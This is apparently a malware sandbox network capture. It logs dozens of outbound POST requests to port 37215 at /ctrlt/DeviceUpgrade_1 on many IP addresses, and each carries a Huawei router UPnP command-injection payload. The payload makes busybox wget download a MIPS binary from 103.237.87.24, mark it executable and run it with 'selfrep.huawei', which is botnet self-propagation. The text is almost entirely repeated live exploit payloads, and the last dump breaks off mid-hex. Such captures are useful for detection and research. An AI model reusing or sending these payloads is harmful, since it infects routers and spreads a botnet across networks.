                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2153192.168.2.1339272157.114.32.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591893911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2154192.168.2.1349222197.221.217.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.591900110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2155192.168.2.1333330197.232.118.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.592040062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2156192.168.2.1348534197.44.216.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.592051983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2157192.168.2.1353656197.142.241.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.592051983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2158192.168.2.1359842157.26.119.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.592065096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2159192.168.2.1339542197.37.139.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.592076063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2160192.168.2.135768881.140.195.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.593797922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2161192.168.2.1349590197.254.175.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.593806028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2162192.168.2.1351390157.242.180.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.593863964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 